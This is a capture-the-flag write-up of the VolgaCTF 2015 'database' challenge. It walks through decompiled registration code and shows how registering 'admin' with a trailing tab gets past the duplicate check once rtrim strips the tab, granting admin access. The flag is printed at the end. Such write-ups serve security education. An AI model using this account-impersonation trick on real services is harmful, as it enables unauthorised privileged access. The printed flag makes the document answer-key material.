
# VolgaCTF 2015: database

**Category:** Pwn
**Points:** 75

> *hack the [database](challenge/database)!*
> *nc database.2015.volgactf.ru 7777*

Its a telnet-service listening on port 7777

In the non-stripped binary we see a couple of functions, when looking at the functionprocess_connection we see a few possible commands (which can also be seen by running the binary through strings):

> get_flag
> whoami
> login
> register
> get_info
> set_info
> logout
> exit

Lets first try get_flag

> This command is prohibited to non-admin users.

Okay, lets try to register admin:
> > register admin a
> > This user is already exists.

Hmm lets look at the register_user function in the binary

> LODWORD(userExists) = g_hash_table_lookup(users, cmd_arg1);
> if ( userExists )
> {
> user_exists_len = strlen(user_exists);
> result = send(SocketFD, user_exists, user_exists_len, 0);
> }
> else
> {
> result = (ssize_t)insert_new_user(cmd_arg1_ref1, cmd_arg2_ref1, 0LL);
> *(_QWORD *)ref_result = result;
> }

So it first checks if the input-string does not already exist as a username and then calls 'insert_new_user'

> username_buf = (char *)calloc(0x40uLL, 1uLL);
> username_after_rtrim = rtrim((const char *)username);
> strncpy(username_buf, username_after_rtrim, 0x40uLL);
> username_buf[64] = 0;
> password_buf = (char *)calloc(0x80uLL, 1uLL);
> password_after_rtrim = rtrim((const char *)password);
> strncpy(password_buf, password_after_rtrim, 0x40uLL);
> password_buf[64] = 0;
> if ( v7 )
> {
> v5 = rtrim((const char *)v7);
> strncpy(password_buf + 64, v5, 0x40uLL);
> password_buf[128] = 0;
> }
> g_hash_table_insert(users, username_buf, password_buf);

So first, the input-string is checked if it does not exist as a username already, and if not, the username gets trimmed' with rtrim(); and inserted into the database.. seems like a vulnerability to me: we can insert something like admin\t, which when checked does not exist, but rtrim proceeds to remove the \t character so we end up inserting 'admin'. Let's try that: simply print a tab-character in your terminal and copy it: $perl -e 'print "\t"' then register admin\t and you're logged in as admin:

> >register admin a
> >whoami
> You are admin.
> >get_flag
> flag: {does_it_look_like_column_tr@ncation}

Original writeup (https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/VOLGACTF/pwn/database).